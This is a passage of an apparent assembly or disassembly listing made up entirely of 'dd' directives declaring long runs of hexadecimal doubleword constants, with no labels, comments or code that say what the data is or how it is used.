		dd 5CAD8431h, 0B49BA12Fh, 2212824Ah, 0AB248BE1h, 0D932B2CAh
		dd 28DA8D29h, 0D256BF1Fh, 2790C56Ch, 359A5B6Fh,	77B15557h
		dd 431E67CCh, 0EC5C495Fh, 9C8F822Bh, 6A22F547h,	0B8AF5313h
		dd 0A561BB88h, 6CE3B170h, 8C9A1C66h, 32D4319Fh,	66016505h
		dd 0A99266B3h, 7C1E4836h, 86CE231Bh, 0D8BA4649h, 68E1C645h
		dd 2CB38963h, 46161961h, 82233369h, 2C6428EBh, 1664B42Ah
		dd 1D950091h, 5AF8E258h, 5F60F4EEh, 0E418CD93h,	717BF68Fh
		dd 81940F3Dh, 54AD5429h, 3ABE9826h, 38A81108h, 0F95DC8D9h
		dd 0C5740BACh, 4174C3F1h, 0C63170C6h, 0FB086CF8h, 0B445798Ah
		dd 0F79F1808h, 4297D83h, 1A95F906h, 487EBF70h, 0BCACDE45h
		dd 7C62FD96h, 8C38D431h, 4A329683h, 191F9404h, 0A96A7D18h
		dd 4318F346h, 126608E9h, 0E0F6EB4Dh, 0C7CC87Fh,	5A11AAF6h
		dd 90AD2B2Dh, 0BF60C1Eh, 0C5F38113h, 0AA303D11h, 0E610ED13h
		dd 0B6C3466Fh, 0C077712Fh, 0DB2B7078h, 0F4FF37EBh, 2028CEB9h
		dd 0A8882263h, 0D512F421h, 0DB51BC51h, 0A9F3DA67h, 0F3530A47h
		dd 2BBF1A53h, 3517A862h, 9FAA8513h, 532FE830h, 0D2CB8AF1h
		dd 1C7ABC16h, 0E018E842h, 12C0294Ah, 0B22380E6h, 8D98D88h
		dd 3652632Dh, 98BA0B62h, 2F08E08Dh, 0E2362367h,	8DA8DA0Bh
		dd 6B319300h, 0C62C223h, 208D08DBh, 236F36D3h, 0DC0CB8CAh
		dd 13403308h, 0D223E237h, 8DD8DC8h, 37537335h, 0D8DA0D62h
		dd 3709608Dh, 0BE062377h, 62F9626Bh, 718E4E49h,	0FAD1E835h
		dd 687F9B70h, 0DA9794F5h, 1D78BE36h, 0D90FFD75h, 0DB77F5D7h
		dd 359EC250h, 4E6C8D7Ah, 32D87E07h, 0A91EBB0Eh,	3D823953h
		dd 9F01EEDAh, 2746320Ch, 0E0F81884h, 6EF552ABh,	0B4AAD34Ch
		dd 0A19A50A8h, 914DD114h, 5D34016Eh, 141421A7h,	3E8E6CE4h
		dd 5AA19887h, 0FD7BF516h, 9A82D33Fh, 6D111B8Ch,	3C10743Fh
		dd 0AD57A4Ch, 0D7FE899Fh, 762218CCh, 0FD5EFFFAh, 0E718038Bh
		dd 79EA7C4Bh, 159D639h,	528326F7h, 0B4312DD0h, 0C4AF275Ch
		dd 3C4EB7DFh, 393854Fh,	567C0347h, 692E8AB0h, 307FE3Fh
		dd 81D49409h, 183507E1h, 0B36A0FE9h, 4AFD0682h,	5E9582E6h
		dd 0ABD5FF38h, 6145D658h, 0B221F927h, 0B8688436h, 0F88C1474h
		dd 0B07C02CEh, 75AC214Ch, 0FD217E60h, 0E28A96A6h, 0F206F89Ah
		dd 80F6D75h, 0B2BF75A2h, 2BF92D05h, 0F6369766h,	0C98D6795h
		dd 3064F990h, 24AFEA39h
		dd 2AF64488h, 0E325D67Ah, 8F8237Ah, 2AE355CBh, 0F5053032h
		dd 5BFD403Fh, 0EDBB9C0Ch, 46578BCBh, 0CAF02D0Ch, 30A5619Ah
		dd 0BEDA1CA2h, 7F8A8CFAh, 0C559FE51h, 3F0EFB6Bh, 2FB97A3Ah
		dd 2EA01260h, 577A3B85h, 8ABB73F4h, 0B9D266Ah, 0E0CF9Dh
		dd 0E7B9D228h, 5FEF7663h, 75B0EBB9h, 3EEFFFADh,	174EB176h
		dd 0A041E05Ch, 5116B71Fh, 1C692770h, 0A576BA47h, 53416883h
		dd 0AAEA3E6Ch, 55D50544h, 0B35317F1h, 0F4C619A2h, 98B50376h
		dd 52E72703h, 38CA5723h, 6B360463h, 0FE3B3FDCh,	6F87A65Ah
		dd 54AA080Dh, 1E31323Ch, 357FBBD7h, 62D265D5h, 0F59C012Ch
		dd 0DEB738AEh, 0B1734615h, 4317DF0Dh, 0D68294D8h, 0C8C052BBh
		dd 0DF33DCE4h, 0D545D5BAh, 4AB33238h, 45C5ED87h, 0C4E1325h
		dd 8D047F32h, 1F3E3626h, 6A9CBA4Ch, 0B62EB36Bh,	20B32C64h
		dd 50DC0CBAh, 95152719h, 0CE31B12Eh, 0DE3254C0h, 95515542h
		dd 5CDC33DBh, 84AB2215h, 0AAA58BE0h, 0A30AD16Ch, 4E189F29h
		dd 58F73A18h, 0D3E8EAD4h, 0A90F6C3Bh, 0DDECAF8Dh, 3418C2C2h
		dd 0A052AA86h, 108B4624h, 0EE0FADA8h, 6310CC14h, 56DC91FEh
		dd 667757EDh, 42B05C81h, 340BC8BFh, 541017D0h, 8FA38E8Ah
		dd 137E3C09h, 917C0256h, 220B96EFh, 0B42B7DCDh,	2AF72FF0h
		dd 0C835F7BAh, 802CFEE1h, 7EFE677Dh, 5537B45Ch,	0FFCE7A5Ch
		dd 0CC44FD33h, 1A206FB0h, 4AFD37ACh, 90FC31DAh,	0CC711A69h
		dd 2E062B0h, 0F8010059h, 0AA7FE20Ch, 150D368Ch,	59D52624h
		dd 0E620F986h, 7442A00h, 0D2FD9031h, 65C7219Ah,	0F69D36C5h
		dd 96712A67h, 422865BEh, 0F15B60BAh, 0D702D83Fh, 6626E7CBh
		dd 0E7616714h, 0B93C8351h, 0B13F307Fh, 7E0A5573h, 0D0D63FF8h
		dd 989CAB6h, 5194FCDBh,	0C7B4F430h, 5DA28A10h, 8B30AA8Eh
		dd 6759E589h, 56F85049h, 57712095h, 99159991h, 36647B90h
		dd 0CE22F1EFh, 45D2555Eh, 8EAFF932h, 232B1F8Eh,	27C556F3h
		dd 6475B314h, 2AC648DCh, 0DD7AABA9h, 85788354h,	66EBE021h
		dd 2FF4AAFAh, 7F6C1DCCh, 0FE8E2060h, 536362A5h,	5415D1C1h
		dd 0A63108B4h, 86E1FE0Ah, 2B7CB264h, 7B8B2DF8h,	6A7AD735h
		dd 0B446A45Bh, 179AA155h, 0F8BEAF8Ch, 5403F4ABh, 6DD71D79h
		dd 267CAAEDh, 0CA440F0Fh, 218596D8h, 98D2003h, 37240056h
		dd 7DF8BC44h, 8586C7A7h, 60C387D0h, 0B2C0BF5Eh,	0D6404C0Fh
		dd 552AB2DEh, 0B1681EA8h, 0E5566A84h, 0B604020Ah, 7621AC04h
		dd 0CDA22C95h, 7025C881h, 0C249BF8Fh, 54316DD9h, 57008BA4h
		dd 256034C3h, 56841CACh, 0ADB140A2h, 7E020A06h,	0F522028Bh
		dd 286DEF06h, 4A85E06Fh, 7908D167h, 0B988D014h,	0B408D784h
		dd 7B23D7C4h, 48899885h, 0D68173h, 904090C2h, 8926C388h
		dd 0B180E611h, 15806711h, 88396C38h, 50CA5C38h,	6A1195C0h
		dd 9AC4305Ch, 346B309h,	40996CE3h, 0D226011Bh, 0B5098446h
		dd 6D636211h, 0E10D98C4h, 0F10D0C45h, 11B8265h,	0C446A267h
		dd 6C117099h, 9B44DE26h, 5B00B809h, 4CFF663Ch, 2450C76Ah
		dd 104EF2Eh, 0D460267Ah, 599CA81h, 0BE4F9C63h, 1B647D18h
		dd 6D045C4Bh, 0CC2F34E3h, 0B49C5184h, 44F1FDC7h, 44373F78h
		dd 2F3B5FB1h, 9DF8F952h, 0F67AC775h, 28799AA7h,	4F747FC5h
		dd 0EB89A3BAh, 43550F83h, 0F6CC94F1h, 0FBCC4428h, 29F1FB65h
		dd 20041DC1h, 0F1D88302h, 67C7707Dh, 0C8CC5FF6h, 0E9A82665h
		dd 0A360B217h, 643EBFC2h, 0F5C20F8Dh, 0E83495D8h, 0C4E9383Eh
		dd 0AA82CFACh, 0D0E0BFDh, 83E609D8h, 0F6C24407h, 5E8F8C14h
		dd 5ABF217Fh, 0DB27A7D0h, 1F5EA10Ah, 79E007C7h,	727D506h
		dd 0FF347C39h, 9960E899h, 0D8BAB8CFh, 5F90B862h, 40F92CECh
		dd 0B1566988h, 0F540F13Eh, 0CB668422h, 9B315432h, 0CD2B1C65h
		dd 68C62D14h, 37460A8Bh, 0E3C0243Eh, 1A413B68h,	68C09B4Eh
		dd 0E2D84644h, 700B1EFAh, 4FFB603h, 0C9896E89h,	8634689Fh
		dd 0BB14D178h, 0C2599CB8h, 8B126707h, 0FA7A8E11h, 58FC12F7h
		dd 75B6225Dh, 33F968CFh, 47D49279h, 0C3AF07Dh, 6238FECFh
		dd 631D17CAh, 61CB27C9h, 12593D60h, 81C337F1h, 4785E319h
		dd 0B1A1D06h, 0F5234EA0h, 193604CFh, 0CB19F451h, 63513A06h
		dd 96086440h, 482F2A8Ah, 5C2EC4D1h, 0D526D32Fh,	0D4527E67h
		dd 89FEAA29h, 38BF07F2h, 98CCACDh, 63F88855h, 2F646278h
		dd 6CA803AFh, 8C4D618Bh, 8C6B44F7h, 0CC84340Fh,	89509E61h
		dd 8104C488h, 67235D88h, 24FED1CEh, 2768057Ah, 73E72C43h
		dd 0EE6CFCCDh, 0CD20BD11h, 0A2085F8Ch, 0C46D7995h, 31627FE6h
		dd 0AABAE18Fh, 5C864099h, 302F2C60h, 0B7FE2486h, 0E7A24C92h
		dd 8BFBF006h, 0BB133DDh, 98B0D96Eh, 0AF347974h,	0C954624Ch
		dd 2C0380BFh, 29A98266h, 501C3DA6h, 0A258415Eh,	30298347h
		dd 0B1E6BC1h, 0EE27D032h, 0DF18A81Fh, 8C46F580h, 99A784AEh
		dd 0B2881836h, 0F6698013h, 22315DA5h, 1A394ACAh, 0DA17DE7Eh
		dd 1C68499Fh, 281CF769h, 0A631CE62h, 0ED98481Fh, 2C146068h
		dd 0CD1C8FBBh, 6A7DCD02h, 98D9B347h, 1D8CD9ECh,	99A72D0Dh
		dd 1BE15381h, 0A9B1C353h, 37451A3Ch, 0A3B7441Ah, 7035B679h
		dd 52D84B0Fh, 71009A3Bh, 0D3F10FB0h, 0CC346324h, 0E1A4FFACh
		dd 0ED9B40BFh, 4DBF1E68h, 35818563h, 2541B349h,	57152B26h
		dd 105974A8h, 3189280h,	0AA7A6381h, 0B509BAA1h,	0B288E1F8h
		dd 0CBD9A811h, 6632C27Ah, 6600D969h, 658C9930h,	0E1696394h
		dd 1B8C84B1h, 70143F6Dh, 0C234AF9Eh, 6434EBB1h,	0A3196973h
		dd 0F046E469h, 68A0A84Fh, 0C37FBFE7h, 0EFD9FCB1h, 4608DA34h
		dd 0D181BEBBh, 0A185D264h, 0D234CD62h, 0DAB19646h, 63252585h
		dd 99A41A26h, 289BD58Fh, 4609A1B1h, 0FCCA18D3h,	9185D789h
		dd 0B90497E2h, 0EC4DA4D1h, 188901D3h, 9868703Ah, 0D739ED18h
		dd 50911F08h, 94BA30Ah,	255034A9h, 0E66812AAh, 0C14849A2h
		dd 1F1AD868h, 5630CFD9h, 44432E45h, 1A8F6A83h, 0C15845E9h
		dd 0CAF53450h, 0C95AD1A8h, 8D98CAC0h, 4C522A66h, 5202563Bh
		dd 398E0C58h, 1535BD10h, 14693460h, 8F4FE2B0h, 71A5C005h
		dd 5212D627h, 74D33461h, 9BC4A627h, 33903709h, 8B0A7210h
		dd 33AE1E6Ch, 5BCCD1B2h, 0A32A3464h, 0C7E53A14h, 9D96233Ah
		dd 1A428279h, 0CF9BF146h, 70656627h, 0B2D4458Dh, 0BA311E68h
		dd 5C44ECD0h, 2E32B434h, 765AFD72h, 65CE831Ah, 97002EC6h
		dd 0E1210C0Ch, 91360218h, 29F5ACB7h, 76038C00h,	67D3B4D4h
		dd 0F0EEAFDAh, 0CC697491h, 4FDB2D42h, 83A25F4Dh, 0D115F6D1h
		dd 1B428CD8h, 4A947C02h, 0B23456CCh, 84AD0150h,	452D54D6h
		dd 12228911h, 4682095Bh, 1372992Ch, 4696264Ah, 0B1284778h
		dd 11A62640h, 469AB4Bh,	0E11A88D3h, 4213E234h, 8453889Bh
		dd 41112189h, 45D22809h, 4922C902h, 1170A024h, 3FA9E952h
		dd 0C328E481h, 0EC1D0991h, 0A08DD544h, 8C233D12h, 8E1A484Eh
		dd 914B5510h, 2A02F262h, 0EF2A9DD1h, 33985444h,	35E86721h
		dd 6A8F9F49h, 0FAC0A5C6h, 0EEA17311h, 33F099ABh, 0C089644Ch
		dd 0F17345F2h, 89026491h, 0D8B168A1h, 0B63E3B29h, 0C7D6A53Ah
		dd 12B1B12Eh, 2D8D251Bh, 0B0D5E54h, 79381B4Ch, 7AE20BCAh
		dd 0A361F113h, 0BC7DB8BCh, 7446ECC0h, 78991972h, 5E4E9092h
		dd 0EF292076h, 0A43A8B47h, 2497501Eh, 4932ED21h, 4C69748Ch
		dd 0E9A09CBh, 2865031Bh, 312542D0h, 0E5700C5Fh,	52A02A0Ah
		dd 494D6938h, 9829C9E3h
		dd 7FEB3446h, 104C4F31h, 384C48DDh, 0F11C3499h,	3C4A3094h
		dd 94E58C25h, 0D26D7092h, 0D2124008h, 34982338h, 3CD213B1h
		dd 4CD28D23h, 0C50E18D2h, 468F33D5h, 0A989E1A4h, 0A5216311h
		dd 69302949h, 0FF22CDC6h, 3654C2E6h, 0A154D6D2h, 0E8221189h
		dd 0D25335E6h, 89E6975Dh, 489F84A7h, 0A8A58133h, 8F6949BEh
		dd 0D099CEF6h, 0A94E11FAh, 349EAE91h, 0E5A14D23h, 23E36C8Bh
		dd 4D7512D9h, 0B609F851h, 0CE42991Fh, 1AE09B44h, 1B906731h
		dd 4CF485D1h, 0F7BD99CCh, 21337ABFh, 0E8C57227h, 15989899h
		dd 7D8F02E7h, 8A7BD829h, 0A447B474h, 69A457D9h,	0FF9B9712h
		dd 78A64E93h, 0F112D94h, 90D991B2h, 0A46645C6h,	4711A4B9h
		dd 66939023h, 0B1A42E9Bh, 3498A691h, 90050C94h,	691BD2C6h
		dd 62C18E6Ch, 0D2552309h, 628AD288h, 0D4311C4Ch, 0A628BE59h
		dd 0AEA84692h, 3C8691A4h, 622B0A23h, 87542417h,	856E1E52h
		dd 0B1930213h, 2785A0E0h, 3E837613h, 700F7AF3h,	4001C77h
		dd 441FBACDh, 0F2225BE0h, 5E28405Ah, 0CB5028B8h, 38D3218Fh
		dd 48B1377Eh, 0C48ACCEh, 76341E35h, 0DB7E0AB6h,	1A73EE31h
		dd 0BDF018EBh, 659FA707h, 0D369267Dh, 0F03BA3B0h, 409BF763h
		dd 0BA46FED8h, 0A848D986h, 0ACF58521h, 75E4F8BFh, 0A3102630h
		dd 0B3816D3Ch, 7D1881E1h, 8B09FC22h, 31A70DD1h,	0A973DF96h
		dd 8B7D6CF8h, 269B3F2Ch, 0C23821BBh, 0C8CBC47Eh, 0F8C74EA2h
		dd 591C6C33h, 4FC09E6h,	183B2AD3h, 0D983B57Eh, 8BB69647h
		dd 0FB409164h, 6A090551h, 9D4499A4h, 17C4BA09h,	66916BC2h
		dd 0A1916D02h, 0CD223220h, 32A8DA04h, 4CA86441h, 0AB048D14h
		dd 4C8426E4h, 469D8D54h, 5C6AE4D3h, 8D5E6A1h, 0BCE10923h
		dd 0A826444Bh, 935A8A1h, 50C69F3h, 9921092h, 82C98F24h
		dd 444544C8h, 58C8C2D1h, 6722AEEAh, 49AF0DC1h, 3032A662h
		dd 0C3347EE9h, 53110A20h, 0BEE4171Fh, 0D3181471h, 3CC41E0Eh
		dd 949F072Ah, 450CA0A1h, 0CB105673h, 17F5843Eh,	1FFAB2E1h
		dd 2D103611h, 0C659B145h, 597D0140h, 78BBFAD9h,	0EE4C5076h
		dd 58CBB0D1h, 4ACD383Eh, 0FAC547D3h, 695D535h, 6B09E513h
		dd 989F41A8h, 3094A07Fh, 4EFBC943h, 3F34252Ch, 23E62989h
		dd 96DBACA9h, 99B2687h,	15C4352Bh, 13F2F92h, 80D64AC6h
		dd 0EAE22DB4h, 29FD5B6Ch, 669429B3h, 0AECC6911h, 1332F1A4h
		dd 0D11C2667h, 0CE050984h, 0F59E219h, 32B8B84Dh, 39C7C694h
		dd 4F91CCA7h, 1921E185h, 7B609977h, 5F0B30Ch, 36E3539Fh
		dd 9469790Ch, 59D9050Dh, 26335DFAh, 8FFE46A6h, 89A23E29h
		dd 0ED2F5411h, 0E1245E71h, 3461CD2Bh, 264B68E2h, 9923E94h
		dd 8A63132Bh, 122404ABh, 22EAEB50h, 0ED289481h,	5692AA03h
		dd 0FA505965h, 4975E153h, 0F8D1A63Fh, 2E2C6E36h, 337070E5h
		dd 469CB4E6h, 4D0A8930h, 0A514317Ch, 32D671A9h,	0A6424AA5h
		dd 0BE769420h, 24497A10h, 266BD290h, 74593CD4h,	671113E9h
		dd 3B2914BDh, 9923ED62h, 0EA6DB3B2h, 4E926D68h,	2E8CD8A6h
		dd 6546EAEAh, 3CB3204Ah, 0A65B90DCh, 6B7356D8h,	84AB6D72h
		dd 1D89AF95h, 679B8F02h, 0A34A79BDh, 0C4A5645Bh, 612AC255h
		dd 84C308A5h, 0C1CEE252h, 42DCC8CBh, 0D1A8501Ah, 0E96297C6h
		dd 11A88990h, 0BE8B7F52h, 48598897h, 0AA234953h, 0E9821C46h
		dd 0C9425413h, 29626134h, 4A386461h, 29E33938h,	11A49461h
		dd 76939D6Ch, 56909658h, 927FF0D1h, 92CA3480h, 0BDCD5B46h
		dd 7FAE9B63h, 40A0254Eh, 0F84D4C11h, 0C7096908h, 29CFD201h
		dd 0FABFD0AFh, 8C25FC68h, 0E9D9C652h, 14241C52h, 15F4B9D7h
		dd 0A5D3DF25h, 45B6D338h, 63D9A980h, 4C95F88Ch,	7E5CFB28h
		dd 1DCAD8CAh, 7D1E7C2Ch, 91FB5D3Ch, 0AC78DBF4h,	0EFA95099h
		dd 914B0B79h, 99A9EF9h,	8114A535h, 66B1C4CFh, 96D1ED42h
		dd 1BE83017h, 709B2694h, 5BD2451Ah, 0A0D1931Bh,	7F508E34h
		dd 88970BE2h, 0D28B11A7h, 68D2E90Bh, 13E98F49h,	0F1338352h
		dd 0E947C264h, 4E33E045h, 0F4A3368Ch, 0F4A44A1Ch, 0F25B2E9h
		dd 55A371A5h, 2D2A5134h, 12450B76h, 991A9EA3h, 61422409h
		dd 14A96224h, 0F9601165h, 78D5E946h, 47CF56ECh,	2130ADE9h
		dd 87932A66h, 297F9A84h, 0C4D62D32h, 2B099623h,	0A297EC5Fh
		dd 14939B9Eh, 0DD8A0CA1h, 44AE2F3Ah, 7924ED58h,	175048FAh
		dd 78195375h, 33C5847Ch, 0B2194542h, 94C04865h,	4CFCC691h
		dd 4C22613h, 822F2298h,	7F08699Fh, 5F624C6Eh, 0B848A2A8h
		dd 4CA9A44h, 0E08ABED4h, 229A2267h, 0B28B2DFCh,	29BA4B2h
		dd 9EDE4B3h, 0A29864F1h, 7DEBF4E1h, 7E503D6Ah, 59F352D2h
		dd 8B2494FAh, 84CD4D35h, 0BE2FA97h, 4E9FE465h, 786B2587h
		dd 0F5F1976Bh, 56942C93h, 1E0A14DEh, 2876221Fh,	8ECDC54h
		dd 2349C4ABh, 4C34AC20h, 80A70D88h, 31899908h, 0A8176213h
		dd 0AB4D9087h, 0A456A188h, 0ED487F29h, 2642148Bh, 626A4CA6h
		dd 0A2F11C8h, 4A6DD2EDh, 27B792EEh, 8A6195E8h, 0DEB4DE16h
		dd 67114A27h, 0CC11CE02h, 0D91E3E9Bh, 8D3E4C1Eh, 6DF5E22Ch
		dd 63146011h, 6F77854Bh, 5DB02412h, 5118591Ah, 8D3909C0h
		dd 0BC2392ACh, 1CB8BED6h, 0F625BE3Ch, 6C86A862h, 83AF5A7Bh
		dd 1290B164h, 84AF095Fh, 1EA02297h, 8AB48948h, 9A455E24h
		dd 0EE61E276h, 0ED50E988h, 26480DA2h, 48FB4CAAh, 68EA11C2h
		dd 0A8ED4C3Ch, 23F74C61h, 8A62988Eh, 0F7DDE6A2h, 99B42769h
		dd 37643360h, 0FC474FA7h, 233F530Bh, 6E06B68Dh,	771A6211h
		dd 0CEF59D4Ch, 42704669h, 0AD6D17CCh, 0C0F97846h, 2D5233Dh
		dd 85CCFEDEh, 60D9E543h, 84D74AE1h, 38890DA2h, 53807013h
		dd 4C989304h, 49D399C4h, 0AA4E263Dh, 0E4674388h, 0E61EB229h
		dd 0B561488Eh, 264C928Bh, 0AC891CAEh, 0CCF5159Dh, 0D33BBA5Bh
		dd 9C2C27AEh, 0B7ADDA2Ah, 99D4AA2Ah, 0C9DF33A0h, 0C4616A23h
		dd 0A2CAF914h, 0E13311EEh, 5312C3E5h, 49E4872Ch, 61769A82h
		dd 5F24FD65h, 5229BC22h, 0B4F87DCFh, 7BB2C3B7h,	0E625FCF0h
		dd 65CCA22Eh, 7C6D7315h, 0D132391Ah, 6C138266h,	9407808Ah
		dd 0A8883689h, 61E9A8D7h, 408EAB4Fh, 8A8BA472h,	32C8E627h
		dd 470BB581h, 713E9940h, 9FC5A3FEh, 0E59648AFh,	0D59431E7h
		dd 0E3F56FA6h, 45B8D388h, 0C92BA990h, 0B5CB825h, 2FFD165Bh
		dd 0E71F4D3Fh, 23DCB60Eh, 0D4CBAECAh, 0C72A5E63h, 2F2AA3C1h
		dd 0B2811BBBh, 0DD442CABh, 39D03D49h, 228DCAA2h, 0D30D4CA8h
		dd 936AA638h, 0D3FB507Ah, 1EBEA22Bh, 8C916269h,	684CA3B9h
		dd 541122EDh, 6AD3B626h, 2E93CAA2h, 2F6788C2h, 0F76389F2h
		dd 98FBE969h, 0EB53C08Eh, 696D727Dh, 0B44D337Eh, 0E0EA5271h
		dd 38FD0F2Dh, 88965C13h, 7E60A42Eh, 0ACB7DB42h,	4450A601h
		dd 0E12583D7h, 3A3CBC6Dh, 73145C54h, 7B87E423h,	0E02E2AF9h
		dd 699070C3h, 9960CA15h, 7AC84C34h, 7747A9Fh, 39688AB5h
		dd 0AE089A48h, 132EEE63h, 472BB5Ch, 0B4EA8996h,	0E4EBC88Fh
		dd 0C334C48Bh, 2EA914A5h, 0BD4F9E8Bh, 163DA1C8h, 6817E8F5h
		dd 1EA750F1h, 598C6062h, 0ECC8E50Eh, 8C2F81A4h,	3D53EF12h
		dd 2053A1A0h, 51F1A71Eh, 0A15FEAAh, 0D785F87Eh,	0F9C9DB76h
		dd 1001F504h, 7E236A31h, 2AD98E5h, 38605082h, 0E2FEC132h
		dd 0C1C0FC61h, 0C289AF02h, 0A0542203h, 0F25012AEh, 0B7110880h
		dd 5A9094C2h, 1465A436h, 9A011307h, 4665E074h, 0E244E1h
		dd 1231AE8h, 42887885h
		dd 8C010919h, 3C48124h,	1D314533h, 0E2E164F1h, 1F869CA8h
		dd 0C6DC755Ch, 3DD0FF56h, 27F45A5Ch, 503D3ABBh,	95C532E9h
		dd 5E2954F9h, 1FA9D09Ah, 1FFB5FCCh, 0E670F263h,	3FF0A839h
		dd 0C0353E72h, 0D2300835h, 0F4F32501h, 0FA40B078h, 46244F55h
		dd 1063B9E5h, 4A58049Eh, 0FD18F4F1h, 26043D0Ch,	4BA5FB6h
		dd 0F6184EF5h, 83F0EE07h, 0E2635783h, 3A8B41D4h, 69BC5B42h
		dd 1D05AC7h, 680B23ACh,	9D3A4159h, 0E15AC8EEh, 61E8833Dh
		dd 0FB55A42Fh, 0B01B857Fh, 9B7ECDC7h, 4AA5707Fh, 1A52417h
		dd 14E37693h, 1200E2E7h, 0E627976Bh, 3C5C6028h,	3E242AA6h
		dd 73D729F8h, 48A0119Ah, 0AE72085Fh, 0E715FD43h, 503E6DCBh
		dd 63444AF9h, 19BE4804h, 0E92D3406h, 60F2117h, 11112B8Fh
		dd 2A6C3A34h, 3626D3D1h, 2EC46C97h, 0A4EB4A5Bh,	0D2330E1Fh
		dd 2E431525h, 0C022F958h, 0A57A2C53h, 90AFDDB8h, 89C975C0h
		dd 0A6CDD6A7h, 10CCA8C9h, 0CC5510BBh, 187D5F17h, 0BE774281h
		dd 0FB853ED8h, 633ADFA2h, 0E9B381D6h, 8A3169C4h, 10EFA515h
		dd 0A85E0080h, 243B7412h, 6284D888h, 2E5D07C6h,	7ABAFF50h
		dd 0BA8E2AFDh, 8F58FE8Dh, 0E3B2E864h, 0AB553310h, 2FEA8D18h
		dd 77E1D92Ah, 0E4C0FA0Dh, 58A343F4h, 277D4C44h,	42E5AA65h
		dd 378E1BBCh, 8E92067Ch, 492A6DCDh, 277D8650h, 5D2570C2h
		dd 0F207EEA9h, 549D5D9Ah, 35F750ABh, 895F92C4h,	488C764Bh
		dd 8B04BD41h, 447E155Ah, 8EF9AF8Fh, 4C9AB650h, 33BAD8CFh
		dd 1396917Ah, 36ECB761h, 75E8878Dh, 0CE2256h, 0AD5AE962h
		dd 5719CB3Bh, 17994458h, 1AEE85C7h, 189C6D25h, 1809914h
		dd 89C28BD9h, 3B399555h, 3646308Ah, 571712B8h, 0B2F51D99h
		dd 554450ADh, 17D9F0CDh, 5569B0h, 0B5D483F1h, 0F26EE90h
		dd 0D7065068h, 87E0344Bh, 0E2BBC51Ch, 0B3173C3Fh, 636A7A2Ch
		dd 0DF425D94h, 7717189h, 980EEE78h, 8D4527A3h, 0F5C44C0Bh
		dd 0BAAC9991h, 0C0F46CD8h, 7DFDB307h, 0FA096023h, 0B8E1DF87h
		dd 1C1B010h, 0BE925431h, 5DD066C4h, 2C9411FCh, 9CE5660h
		dd 8BFC2AF8h, 0B0C6DA39h, 0EC70636Eh, 255C82ABh, 0AFBA199h
		dd 15093D23h, 0CC362773h, 0A506A55h, 12EF7F26h,	407CFE26h
		dd 0C834278Dh, 0AA99249h, 96785D67h, 3E957DCFh,	95DEC570h
		dd 64AF9BA4h, 81FF6649h, 0D918BF53h, 0E9848483h, 1BF61720h
		dd 84B00BFBh, 610167D6h, 60E1AC3Fh, 27D02B0Bh, 8ABE2B33h
		dd 2C150CEAh, 0CABBD6C8h, 0E4FC02CFh, 0EE413F9Ah, 0CC45ABA0h
		dd 92931321h, 14EA23E6h, 0B3B62556h, 0C0A529CAh, 30925ACFh
		dd 80AE2B7Fh, 4142216Ah, 0EBCFAC24h, 0C1B5C35h,	1FAFAD98h
		dd 1F8F58AEh, 0D5291B3h, 481778DDh, 0D2C4AAD4h,	0A9552C32h
		dd 8A3B6BACh, 0AADA34A4h, 0F1D69128h, 13319A07h, 579E0746h
		dd 0D8098C61h, 5D14E180h, 0F9892301h, 3D6576F5h, 518DF18Dh
		dd 1B50FED4h, 0C31717C6h, 467E8B03h, 67FD3B17h,	9A29AC8Bh
		dd 164A1228h, 175F584Dh, 4338F43Dh, 100B73F7h, 8B8C9BAEh
		dd 8C2C092h, 0B314530h,	2F3B864h, 1EB10BEFh, 40C01430h
		dd 602870C0h, 0CCF8A553h, 0A8010487h, 1BD8C81Eh, 15057D58h
		dd 0D824DB28h, 1731DCE9h, 0FAA1318Ch, 0DED7B608h, 5AEBBB80h
		dd 5117DC97h, 7ABB8C60h, 0B097DC9Ch, 1E280A9h, 1E2A4C29h
		dd 8864BEB5h, 44979441h, 0D7178CCCh, 5CABDE22h,	9305D445h
		dd 918DE222h, 0A089D53Fh, 2C4D2D1h, 0C0992BFCh,	960B374h
		dd 0F9D87C68h, 0EA2034E2h, 1E95A88Ch, 950BEF5h,	927142Ah
		dd 8D584950h, 908D748h,	0BCEA43BAh, 0C9822E6Bh,	0C678A1Ch
		dd 54C05465h, 8D8BE010h, 0C68B6EACh, 0C3F3C6B2h, 0C0FCEE0Ch
		dd 331C5EB2h, 61BBCF3Bh, 6644115h, 883F45F7h, 3F865F7Bh
		dd 9FB6A493h, 28F151C3h, 48F10523h, 29CCE4E2h, 0F2E684E3h
		dd 284C9ACCh, 8DF376Ah,	3D95B5B8h, 9883B5F7h, 1465AB24h
		dd 74556115h, 6052F5BFh, 89D08336h, 5D57B411h, 580D8138h
		dd 0F98CD4A1h, 0B601D973h, 8D5561FBh, 3FBF8AAFh, 889B91E8h
		dd 4CF1A890h, 1984301Fh, 405AA482h, 4F01617Fh, 77A72BD3h
		dd 0A1960198h, 151A7C3Bh, 66450B46h, 15187113h,	1F60CABBh
		dd 3BBFD40Eh, 0F536A860h, 0C24949B7h, 689DFDA2h, 0AD93C69h
		dd 36792AD1h, 2ACBE86Bh, 7335024Dh, 0F175EA13h,	0A8AEF8BEh
		dd 90861A45h, 0B225A88Ah, 0C068190Ah, 0C5FD6786h, 1692E11h
		dd 819C280Dh, 0F4B381C1h, 709C13C5h, 14D1C638h,	1544DD56h
		dd 9457FA5Dh, 9895D8CAh, 44D13F47h, 98CE2190h, 0BFA3753Ah
		dd 37E517F0h, 0B740DA44h, 24D29FDBh, 5D1744FAh,	94BECAF5h
		dd 8B1395CFh, 6A2BC31Fh, 0A0372D0h, 1F2AE8E2h, 8C69B287h
		dd 7F5ED66Ah, 16ABB1E6h, 8C26551Bh, 0D58B33F8h,	0AD3E8DE3h
		dd 88CCFA72h, 0AD1FE6D5h, 6ABB6469h, 7F51066Fh,	0A09A494Bh
		dd 0AC572409h, 51596520h, 82027546h, 0B32649Fh,	51D8BCC1h
		dd 997DF332h, 92EEB63Dh, 8FC63AE1h, 79CCAFBEh, 0C630D485h
		dd 42CE7B81h, 57AA5154h, 0ACEF0D9Bh, 4A106390h,	3E7AB091h
		dd 0DC51CF1h, 221E563Ah, 4F1C4348h, 0AA68868Eh,	852A89DDh
		dd 1F2A4A37h, 0B941BB88h, 1F6577C1h, 130A0BF2h,	0ACAF5455h
		dd 8FD2B1E3h, 0B46FA9A6h, 482D61ABh, 9EA903D4h,	9B21522Ah
		dd 0B9337D61h, 57C48CE6h, 16A8FFA1h, 21FE4323h,	9C9C2318h
		dd 0E96802FBh, 0A1AABBC3h, 451A3A1Bh, 0AE17C1A3h, 1BA11AD2h
